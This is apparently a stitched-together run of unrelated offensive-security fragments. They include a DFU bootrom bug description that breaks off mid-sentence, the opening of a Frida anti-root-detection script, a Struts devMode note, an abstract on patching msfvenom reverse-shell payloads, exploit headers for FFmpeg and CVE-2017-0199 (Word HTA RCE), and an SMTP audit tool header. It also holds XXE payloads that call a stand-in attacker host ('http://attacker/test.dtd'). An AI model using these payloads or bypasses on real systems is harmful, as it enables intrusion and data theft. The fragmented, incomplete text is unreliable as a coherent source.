Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
This bug was also called moonshine in the beginning
Basically the following bug is present in all bootroms I have looked at:
1. When usb is started to get an image over dfu, dfu registers an interface to handle all the commands and allocates a buffer for input and output
2. if you send data to dfu the setup packet is handled by the main code which then calls out to the interface code
3. the interface code verifies that wLength is shorter than the input output buffer length and if that's the case it updates a pointer passed as an argument with a pointer to the input output buffer
4. it then returns wLength which is the length it wants to receive into the buffer
5. the usb main code then updates a global var with the length and gets ready to receive the data packages
6. if a data package is received it gets written to the input output buffer via the pointer which was passed as an argument and another global variable is used to keep track of how many bytes were received already
7. if all the data was received th
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
//   of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (killed itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
    var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
Apache Struts is an open source framework for Java EE web applications that encourages the use of the MVC (Model View Controller) architecture. When the application has been developed in so-called devMode, as set in the struts.xml file:
<constant name="struts.devMode" value="true" />
Then the middleware handles additional parameters passed to every function invocation.
Abstract
This document explains how to locate WaitForSingleObject(..., INFINITE) within a payload generated by msfvenom (4.12.23-dev) and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching on issues like stack alignment and locating and patching WaitForSingleObject. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching on the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.
Contents:
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
#!/usr/bin/python
#
# Vulnerable software:
# FFmpeg 0.4.9-pre1 (before 0.5), or the one accessible at:
# SVN-16556
# svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk@16556 ffmpeg
#
# Vulnerability has been discovered and documented by:
# Tobias Klein / http://www.trapkit.de
# http://www.trapkit.de/advisories/TKADV2009-004.txt
# Exploit Author: Juan Sacco at KPN Red Team
# Developed using Exploit Pack - http://www.exploitpack.com <jsacco@exploitpack.com>
#
# Description: Microsoft Word (CVE-2017-0199) is prone to an RCE through an HTA Handler
# A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files.
# An attacker who successfully exploited this vulnerability could take control of an affected system.
#
# Impact: An attacker could exploit this vulnerability to execute arbitrary commands in the
# context of the application. Failed exploit attempts could result in a
# denial-of-service condition.
#!/usr/bin/python3
#
# SMTP Server configuration black-box testing/audit tool, capable of auditing
# SPF/Accepted Domains, DKIM, DMARC, SSL/TLS, SMTP services, banner, Authentication (AUTH, X-EXPS)
# user enumerations (VRFY, EXPN, RCPT TO), and others.
#
# Currently supported tests:
# 01) 'spf' - SPF DNS record test
#     - 'spf-version' - Checks whether SPF record version is valid
#     - 'all-mechanism-usage' - Checks whether 'all' mechanism is used correctly